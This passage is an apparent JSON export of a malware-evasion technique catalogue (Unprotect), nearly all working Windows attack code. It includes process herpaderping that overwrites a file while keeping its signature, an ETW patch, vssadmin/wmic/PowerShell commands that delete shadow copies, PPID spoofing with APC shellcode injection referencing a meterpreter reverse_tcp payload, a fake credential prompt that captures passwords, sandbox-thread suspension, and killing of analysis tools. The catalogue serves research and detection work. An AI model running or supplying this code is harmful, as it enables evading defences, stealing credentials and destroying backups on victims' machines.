}\r\n\r\n    Utils::Log(Log::Information, L\"Created image section for target\");\r\n\r\n    status = NtCreateProcessEx(&processHandle,\r\n                               PROCESS_ALL_ACCESS,\r\n                               nullptr,\r\n                               NtCurrentProcess(),\r\n                               
PROCESS_CREATE_FLAGS_INHERIT_HANDLES,\r\n                               sectionHandle.get(),\r\n                               nullptr,\r\n                               nullptr,\r\n                               0);\r\n    if (!NT_SUCCESS(status))\r\n    {\r\n        processHandle.release();\r\n        RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n                                   status, \r\n                                   L\"Failed to create process\"));\r\n    }\r\n\r\n    Utils::Log(Log::Information,\r\n               L\"Created process object, PID %lu\",\r\n               GetProcessId(processHandle.get()));\r\n\r\n    //\r\n    // Alright we have the process set up, we don't need the section.\r\n    //\r\n    sectionHandle.reset();\r\n\r\n    //\r\n    // Go get the remote entry RVA to create a thread later on.\r\n    //\r\n    uint32_t imageEntryPointRva;\r\n    hr = Utils::GetImageEntryPointRva(targetHandle.get(),\r\n                                      imageEntryPointRva);\r\n    if (FAILED(hr))\r\n    {\r\n        Utils::Log(Log::Error, \r\n                   hr, \r\n                   L\"Failed to get target file image entry RVA\");\r\n        RETURN_HR(hr);\r\n    }\r\n\r\n    Utils::Log(Log::Information,\r\n               L\"Located target image entry RVA 0x%08x\",\r\n               imageEntryPointRva);\r\n\r\n    //\r\n    // Alright, depending on the parameter passed in. We will either:\r\n    //   A. Overwrite the target binary with another.\r\n    //   B. 
Overwrite the target binary with a pattern.\r\n    //\r\n    if (ReplaceWithFileName.has_value())\r\n    {\r\n        //\r\n        // (A) We are overwriting the binary with another file.\r\n        //\r\n        Utils::Log(Log::Success,\r\n                   L\"Replacing target with \\\"%ls\\\"\",\r\n                   ReplaceWithFileName->c_str());\r\n\r\n        wil::unique_handle replaceWithHandle;\r\n        replaceWithHandle.reset(CreateFileW(ReplaceWithFileName->c_str(),\r\n                                            GENERIC_READ,\r\n                                            FILE_SHARE_READ |\r\n                                                FILE_SHARE_WRITE |\r\n                                                FILE_SHARE_DELETE,\r\n                                            nullptr,\r\n                                            OPEN_EXISTING,\r\n                                            FILE_ATTRIBUTE_NORMAL,\r\n                                            nullptr));\r\n\r\n        if (!replaceWithHandle.is_valid())\r\n        {\r\n            RETURN_LAST_ERROR_SET(Utils::Log(\r\n                                        Log::Error, \r\n                                        GetLastError(), \r\n                                        L\"Failed to open replace with file\"));\r\n        }\r\n\r\n        //\r\n        // Replace the bytes. We handle a failure here. 
We'll fix it up after.\r\n        //\r\n        hr = Utils::CopyFileByHandle(replaceWithHandle.get(),\r\n                                     targetHandle.get(),\r\n                                     FlagOn(Flags, FlagFlushFile));\r\n        if (FAILED(hr))\r\n        {\r\n            if (hr != HRESULT_FROM_WIN32(ERROR_USER_MAPPED_FILE))\r\n            {\r\n                Utils::Log(Log::Error, \r\n                           hr,\r\n                           L\"Failed to replace target file\");\r\n                RETURN_HR(hr);\r\n            }\r\n\r\n            //\r\n            // This error occurs when trying to truncate a file that has a\r\n            // user mapping open. In other words, the file we tried to replace\r\n            // with was smaller than the original.\r\n            // Let's fix up the replacement to hide the original bytes and \r\n            // retain any signer info.\r\n            //\r\n            Utils::Log(Log::Information,\r\n                       L\"Fixing up target replacement, \"\r\n                       L\"hiding original bytes and retaining any signature\");\r\n\r\n            uint64_t replaceWithSize;\r\n            hr = Utils::GetFileSize(replaceWithHandle.get(), replaceWithSize);\r\n            if (FAILED(hr))\r\n            {\r\n                Utils::Log(Log::Error, \r\n                           hr,\r\n                           L\"Failed to get replace with file size\");\r\n                RETURN_HR(hr);\r\n            }\r\n\r\n            uint32_t bytesWritten = 0;\r\n            hr = Utils::OverwriteFileAfterWithPattern(\r\n                                                targetHandle.get(),\r\n                                                replaceWithSize,\r\n                                                Pattern,\r\n                                                bytesWritten,\r\n                                                FlagOn(Flags, FlagFlushFile));\r\n            if (FAILED(hr))\r\n            {\r\n    
            Utils::Log(Log::Warning, \r\n                           hr,\r\n                           L\"Failed to hide original file bytes\");\r\n            }\r\n            else\r\n            {\r\n                hr = Utils::ExtendFileSecurityDirectory(\r\n                                                targetHandle.get(),\r\n                                                bytesWritten,\r\n                                                FlagOn(Flags, FlagFlushFile));\r\n                if (FAILED(hr))\r\n                {\r\n                    Utils::Log(Log::Warning,\r\n                               hr,\r\n                               L\"Failed to retain file signature\");\r\n                }\r\n            }\r\n        }\r\n    }\r\n    else\r\n    {\r\n        //\r\n        // (B) Just overwrite the target binary with a pattern.\r\n        //\r\n        Utils::Log(Log::Success, L\"Overwriting target with pattern\");\r\n\r\n        hr = Utils::OverwriteFileContentsWithPattern(\r\n                                                targetHandle.get(),\r\n                                                Pattern,\r\n                                                FlagOn(Flags, FlagFlushFile));\r\n        if (FAILED(hr))\r\n        {\r\n            Utils::Log(Log::Error, \r\n                       hr, \r\n                       L\"Failed to write pattern over file\");\r\n            RETURN_HR(hr);\r\n        }\r\n    }\r\n\r\n    //\r\n    // Alright, at this point the process is going to be derpy enough.\r\n    // Do the work necessary to make it execute.\r\n    //\r\n    Utils::Log(Log::Success, L\"Preparing target for execution\");\r\n\r\n    PROCESS_BASIC_INFORMATION pbi{};\r\n    status = NtQueryInformationProcess(processHandle.get(),\r\n                                       ProcessBasicInformation,\r\n                                       &pbi,\r\n                                       sizeof(pbi),\r\n                                       nullptr);\r\n   
 if (!NT_SUCCESS(status))\r\n    {\r\n        RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n                                   status, \r\n                                   L\"Failed to query new process info\"));\r\n    }\r\n\r\n    PEB peb{};\r\n    if (!ReadProcessMemory(processHandle.get(),\r\n                           pbi.PebBaseAddress,\r\n                           &peb,\r\n                           sizeof(peb),\r\n                           nullptr))\r\n    {\r\n        RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n                                         GetLastError(), \r\n                                         L\"Failed to read remote process PEB\"));\r\n    }\r\n\r\n    Utils::Log(Log::Information,\r\n               L\"Writing process parameters, remote PEB ProcessParameters 0x%p\",\r\n               Add2Ptr(pbi.PebBaseAddress, FIELD_OFFSET(PEB, ProcessParameters)));\r\n\r\n    hr = Utils::WriteRemoteProcessParameters(\r\n                               processHandle.get(),\r\n                               TargetFileName,\r\n                               std::nullopt,\r\n                               std::nullopt,\r\n                               (L\"\\\"\" + TargetFileName + L\"\\\"\"),\r\n                               NtCurrentPeb()->ProcessParameters->Environment,\r\n                               TargetFileName,\r\n                               L\"WinSta0\\\\Default\",\r\n                               std::nullopt,\r\n                               std::nullopt);\r\n    if (FAILED(hr))\r\n    {\r\n        Utils::Log(Log::Error, \r\n                   hr, \r\n                   L\"Failed to write remote process parameters\");\r\n        RETURN_HR(hr);\r\n    }\r\n\r\n    if (FlagOn(Flags, FlagCloseFileEarly))\r\n    {\r\n        //\r\n        // Caller wants to close the file early, before the notification\r\n        // callback in the kernel would fire, do so.\r\n        //\r\n        targetHandle.reset();\r\n    }\r\n\r\n    //\r\n    // 
Create the initial thread, when this first thread is inserted the\r\n    // process create callback will fire in the kernel.\r\n    //\r\n    void* remoteEntryPoint = Add2Ptr(peb.ImageBaseAddress, imageEntryPointRva);\r\n\r\n    Utils::Log(Log::Information,\r\n               L\"Creating thread in process at entry point 0x%p\",\r\n               remoteEntryPoint);\r\n\r\n    wil::unique_handle threadHandle;\r\n    status = NtCreateThreadEx(&threadHandle,\r\n                              THREAD_ALL_ACCESS,\r\n                              nullptr,\r\n                              processHandle.get(),\r\n                              remoteEntryPoint,\r\n                              nullptr,\r\n                              0,\r\n                              0,\r\n                              0,\r\n                              0,\r\n                              nullptr);\r\n    if (!NT_SUCCESS(status))\r\n    {\r\n        threadHandle.release();\r\n        RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n                                   status, \r\n                                   L\"Failed to create remote thread\"));\r\n    }\r\n\r\n    Utils::Log(Log::Information,\r\n               L\"Created thread, TID %lu\",\r\n               GetThreadId(threadHandle.get()));\r\n\r\n    if (!FlagOn(Flags, FlagKillSpawnedProcess))\r\n    {\r\n        //\r\n        // Process was executed successfully. Do not terminate.\r\n        //\r\n        terminateProcess.release();\r\n    }\r\n\r\n    if (!FlagOn(Flags, FlagHoldHandleExclusive))\r\n    {\r\n        //\r\n        // We're done with the target file handle. 
At this point the process \r\n        // create callback will have fired in the kernel.\r\n        //\r\n        targetHandle.reset();\r\n    }\r\n\r\n    if (FlagOn(Flags, FlagWaitForProcess))\r\n    {\r\n        //\r\n        // Wait for the process to exit.\r\n        //\r\n        Utils::Log(Log::Success, L\"Waiting for herpaderped process to exit\");\r\n\r\n        WaitForSingleObject(processHandle.get(), INFINITE);\r\n\r\n        DWORD targetExitCode = 0;\r\n        GetExitCodeProcess(processHandle.get(), &targetExitCode);\r\n\r\n        Utils::Log(Log::Success,\r\n                   L\"Herpaderped process exited with code 0x%08x\",\r\n                   targetExitCode);\r\n    }\r\n    else\r\n    {\r\n        Utils::Log(Log::Success, L\"Successfully spawned herpaderped process\");\r\n    }\r\n\r\n    return S_OK;\r\n}"
        },
        {
            "id": 73,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/177/?format=api",
            "description": "Snippet source code from @_vivami",
            "plain_code": "void disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret\r\n\t\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\t\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\t\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\t\r\n\tvoid *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);\r\n\t\r\n\tmemcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\t\r\n}"
        },
        {
            "id": 71,
            "language": {
                "id": 7,
                "label": "cmd",
                "code_class": "cmd"
            },
            "user": {
                "id": 18,
                "username": "hackeT",
                "email": "null@localhost",
                "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                "twitter": "https://twitter.com/T_8ase",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/175/?format=api",
            "description": "",
            "plain_code": "vssadmin.exe delete shadows /all /quiet\r\nwmic shadowcopy delete /nointeractive\r\nvssadmin resize shadowstorage /for= /on= /maxsize="
        },
        {
            "id": 72,
            "language": {
                "id": 8,
                "label": "PowerShell",
                "code_class": "PowerShell"
            },
            "user": {
                "id": 18,
                "username": "hackeT",
                "email": "null@localhost",
                "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                "twitter": "https://twitter.com/T_8ase",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/175/?format=api",
            "description": "",
            "plain_code": "Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }\r\nGet-WmiObject Win32_ShadowCopy | Remove-WmiObject"
        },
        {
            "id": 69,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 17,
                "username": "Halil Dalabasmaz",
                "email": "null@localhost",
                "linkedin": "https://www.linkedin.com/in/hlldz",
                "twitter": "https://twitter.com/hlldz",
                "website": "artofpwn.com",
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/173/?format=api",
            "description": "",
            "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nDWORD getParentProcessID() {\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tPROCESSENTRY32 process = { 0 };\r\n\tprocess.dwSize = sizeof(process);\r\n\r\n\tif (Process32First(snapshot, &process)) {\r\n\t\tdo {\r\n            \t\t//If you want to another process as parent change here\r\n\t\t\tif (!wcscmp(process.szExeFile, L\"explorer.exe\"))\r\n\t\t\t\tbreak;\r\n\t\t} while (Process32Next(snapshot, &process));\r\n\t}\r\n\r\n\tCloseHandle(snapshot);\r\n\treturn process.th32ProcessID;\r\n}\r\n\r\nint main() {\r\n\r\n\t//Shellcode, for example; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c\r\n\tunsigned char shellCode[] = \"\";\r\n\r\n\tSTARTUPINFOEXA sInfoEX;\r\n\tPROCESS_INFORMATION pInfo;\r\n\tSIZE_T sizeT;\r\n\r\n\tHANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());\r\n\r\n\tZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);\r\n\tsInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);\r\n\tInitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);\r\n\tUpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(\"C:\\\\Program Files\\\\internet explorer\\\\iexplore.exe\", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);\r\n\r\n\tLPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tSIZE_T *lpNumberOfBytesWritten = 0;\r\n\tBOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), 
lpNumberOfBytesWritten);\r\n\r\n\tQueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);\r\n\tResumeThread(pInfo.hThread);\r\n\tCloseHandle(pInfo.hThread);\r\n\r\n\treturn 0;\r\n}"
        },
        {
            "id": 70,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 17,
                "username": "Halil Dalabasmaz",
                "email": "null@localhost",
                "linkedin": "https://www.linkedin.com/in/hlldz",
                "twitter": "https://twitter.com/hlldz",
                "website": "artofpwn.com",
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/174/?format=api",
            "description": "",
            "plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, 
&handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
        },
        {
            "id": 68,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 14,
                "username": "Kağan IŞILDAK",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/kaganisildak",
                "website": "https://kaganisildak.com",
                "github": "https://github.com/kaganisildak"
            },
            "technique": "https://unprotect.it/api/techniques/168/?format=api",
            "description": "Source: https://github.com/Malwation/InceptionAttack",
            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n#include <TlHelp32.h>\r\n#define DEBUG_MODE 1\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define ThreadQuerySetWin32StartAddress 9\r\n\r\ntypedef NTSTATUS(WINAPI* NTQUERYINFOMATIONTHREAD)(HANDLE, LONG, PVOID, ULONG, PULONG);\r\n\r\nstruct args {\r\n\tHANDLE hThread;\r\n};\r\n\r\nDWORD_PTR WINAPI GetThreadStartAddress(HANDLE hThread)\r\n{\r\n\tNTSTATUS ntStatus;\r\n\tDWORD_PTR dwThreadStartAddr;\r\n\tNTQUERYINFOMATIONTHREAD NtQueryInformationThread;\r\n\tNtQueryInformationThread = (NTQUERYINFOMATIONTHREAD)GetProcAddress(GetModuleHandleA(\"ntdll.dll\"), \"NtQueryInformationThread\");\r\n\tntStatus = NtQueryInformationThread(hThread, ThreadQuerySetWin32StartAddress, &dwThreadStartAddr, sizeof(DWORD_PTR), NULL);\r\n\tif (ntStatus != STATUS_SUCCESS) {\r\n\t\treturn 0;\r\n\t}\r\n\treturn dwThreadStartAddr;\r\n}\r\n\r\nDWORD_PTR * GetModuleInfo(DWORD pid, const wchar_t *target) {\r\n\tHANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, pid);\r\n\tDWORD_PTR moduleinfo[2];\r\n\tif (hSnap != INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tMODULEENTRY32 modEntry;\r\n\t\tmodEntry.dwSize = sizeof(modEntry);\r\n\t\tif (Module32First(hSnap, &modEntry))\r\n\t\t{\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tif (!_wcsicmp(modEntry.szModule, target)) {\r\n\t\t\t\t\tmoduleinfo[0] = (DWORD_PTR)modEntry.modBaseAddr;\r\n\t\t\t\t\tmoduleinfo[1] = modEntry.modBaseSize;\r\n\t\t\t\t\treturn moduleinfo;\r\n\t\t\t\t}\r\n\t\t\t\t//std::wcout << \"Name: \" << modEntry.szModule << \"\\t Addr: \" << modEntry.modBaseAddr << \"\\n\";\r\n\t\t\t} while (Module32Next(hSnap, &modEntry));\r\n\t\t}\r\n\t}\r\n\treturn 0;\r\n}\r\n\r\nBOOL isTarget(HANDLE tHandle, DWORD pid, const wchar_t *target) {\r\n\tDWORD_PTR ThreadStartAddr = GetThreadStartAddress(tHandle);\r\n\tif (!ThreadStartAddr) {\r\n\t\tstd::cout << \"Get start address of thread failed!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tDWORD_PTR* retmoduleinfo = 
GetModuleInfo(pid, target);\r\n\tDWORD_PTR ModuleStart = retmoduleinfo[0];\r\n\tDWORD_PTR ModuleEnd = retmoduleinfo[0] + retmoduleinfo[1];\r\n\t// Only shows debug mode on (1)\r\n\tif (DEBUG_MODE) {\r\n\t\tprintf(\"THREAD START ADDR: %012X\\n\", ThreadStartAddr);\r\n\t\tprintf(\"MODULE START ADDR: %012X\\n\", retmoduleinfo[0]);\r\n\t\tprintf(\"MODULE END ADDR: %012X\\n\", retmoduleinfo[0] + retmoduleinfo[1]);\r\n\t}\r\n\tif (ThreadStartAddr >= ModuleStart && ThreadStartAddr <= ModuleEnd) { // Is thread start address between ModuleStart and ModuleEnd?\r\n\t\treturn TRUE;\r\n\t}\r\n\telse {\r\n\t\treturn FALSE;\r\n\t}\r\n}\r\n\r\nvoid CrackAnyRun(LPVOID inargs) {\r\n\targs *funcargs = (args*)inargs;\r\n\tHANDLE tHandle = funcargs->hThread;\r\n\twhile (1){\r\n\t\tSuspendThread(tHandle);\r\n\t\tstd::cout << \"Thread suspended\\n\";\r\n\t\tSleep(24000);\r\n\t\tResumeThread(tHandle);\r\n\t\tstd::cout << \"Thread resumed\\n\";\r\n\t\tSleep(1000);\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tHANDLE tHandle, pHandle = 0, hToken;\r\n\tDWORD tid, pid = 0;\r\n\tLUID luid = { 0 };\r\n\tBOOL privRet = FALSE;\r\n\r\n\tif (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))\r\n\t{\r\n\t\tstd::cout << \"OpenProcessToken success!\\n\";\r\n\t\tif (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))\r\n\t\t{\r\n\t\t\tTOKEN_PRIVILEGES tokenPriv = { 0 };\r\n\t\t\ttokenPriv.PrivilegeCount = 1;\r\n\t\t\ttokenPriv.Privileges[0].Luid = luid;\r\n\t\t\ttokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\r\n\t\t\tprivRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL);\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"OpenProcessToken failed! 
Error: \" << GetLastError() << \"\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tif (!privRet) {\r\n\t\tstd::cout << \"Adjust privilege failed!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\r\n\t// Find PID by name\r\n\tPROCESSENTRY32 pe; \r\n\tHANDLE hps = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tif (hps != INVALID_HANDLE_VALUE) {\r\n\t\tpe.dwSize = sizeof(PROCESSENTRY32);\r\n\t\tif (Process32First(hps, &pe)) {\r\n\t\t\tdo {\r\n\t\t\t\tif (!_wcsicmp(pe.szExeFile, L\"srvpost.exe\")) {\r\n\t\t\t\t\tpid = pe.th32ProcessID;\r\n\t\t\t\t}\r\n\t\t\t} while (Process32Next(hps, &pe));\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"Process snapshot cannot taken!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tif (pid == 0) {\r\n\t\tstd::cout << \"Process not found!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\t// Retrieve threads in process\r\n\tHANDLE hth = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n\tif (hth != INVALID_HANDLE_VALUE) {\r\n\t\tTHREADENTRY32 te;\r\n\t\tte.dwSize = sizeof(te);\r\n\t\tif (Thread32First(hth, &te)) {\r\n\t\t\tdo {\r\n\t\t\t\tif (te.th32OwnerProcessID == pid) {\r\n\t\t\t\t\ttHandle = OpenThread(THREAD_SUSPEND_RESUME | THREAD_QUERY_INFORMATION, FALSE, te.th32ThreadID);\r\n\t\t\t\t\tif (tHandle != INVALID_HANDLE_VALUE) {\r\n\t\t\t\t\t\tif (isTarget(tHandle, pid, L\"winsanr.dll\")) {\r\n\t\t\t\t\t\t\tSuspendThread(tHandle);\r\n\t\t\t\t\t\t\t// Only shows debug mode on (1)\r\n\t\t\t\t\t\t\tif (DEBUG_MODE) {\r\n\t\t\t\t\t\t\t\tstd::cout << \"THREADID: \" << te.th32ThreadID << \"\\n\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t// Crack any.run :D \r\n\t\t\t\t\t\tif (isTarget(tHandle, pid, L\"sechost.dll\")) {\r\n\t\t\t\t\t\t\tHANDLE dupHandle;\r\n\t\t\t\t\t\t\tif (DuplicateHandle(GetCurrentProcess(), tHandle, GetCurrentProcess(), &dupHandle, THREAD_SUSPEND_RESUME, FALSE, 0)) {\r\n\t\t\t\t\t\t\t\targs thargs;\r\n\t\t\t\t\t\t\t\tthargs.hThread = dupHandle;\r\n\t\t\t\t\t\t\t\tCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CrackAnyRun, &thargs, 0, 
NULL);\r\n\t\t\t\t\t\t\t\tCloseHandle(tHandle);\r\n\t\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse {\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tCloseHandle(tHandle);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t} while (Thread32Next(hth, &te));\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"Thread snapshot cannot taken!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\twhile (1); // for second thread\r\n}"
        },
        {
            "id": 67,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 16,
                "username": "Ahmed",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/0xastr0",
                "website": null,
                "github": "https://vxcute.github.io/"
            },
            "technique": "https://unprotect.it/api/techniques/131/?format=api",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <vector>\r\n#include <TlHelp32.h>\r\n\r\n#pragma comment(lib, \"Psapi\")\r\n#pragma comment(lib,\"ntdll.lib\")\r\n\r\ntypedef NTSTATUS(NTAPI* _NtGetNextProcess)(\r\n\t_In_ HANDLE ProcessHandle,\r\n\t_In_ ACCESS_MASK DesiredAccess,\r\n\t_In_ ULONG HandleAttributes,\r\n\t_In_ ULONG Flags,\r\n\t_Out_ PHANDLE NewProcessHandle\r\n\t);\r\n\r\nstd::vector<std::string> procs =\r\n{\r\n\t\"ProcessHacker.exe\", \r\n\t\"Wireshark.exe\"\r\n};\r\n\r\nauto terminate_process() -> void\r\n{\r\n\tHMODULE ntdll = GetModuleHandleA(\"ntdll.dll\");\r\n\tHANDLE currp = nullptr;\r\n\tchar buf[1024] = { 0 };\r\n\r\n\t_NtGetNextProcess NtGetNextProcess = (_NtGetNextProcess)GetProcAddress(ntdll, \"NtGetNextProcess\");\r\n\r\n\tfor (int i = 0; i < procs.size(); i++) {\r\n\t\tdo {\r\n\t\t\tGetModuleFileNameExA(currp, 0, buf, MAX_PATH);\r\n\t\t\tif (strstr(buf, procs[i].c_str()))\r\n\t\t\t\tTerminateProcess(currp, -1);\r\n\t\t} while (!NtGetNextProcess(currp, MAXIMUM_ALLOWED, 0, 0, &currp));\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tterminate_process();\r\n\treturn 0;\r\n}"
        },
        {
            "id": 66,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 15,
                "username": "Fumik0_",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/fumik0_",
                "website": "https://fumik0.com/",
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/169/?format=api",
            "description": "",
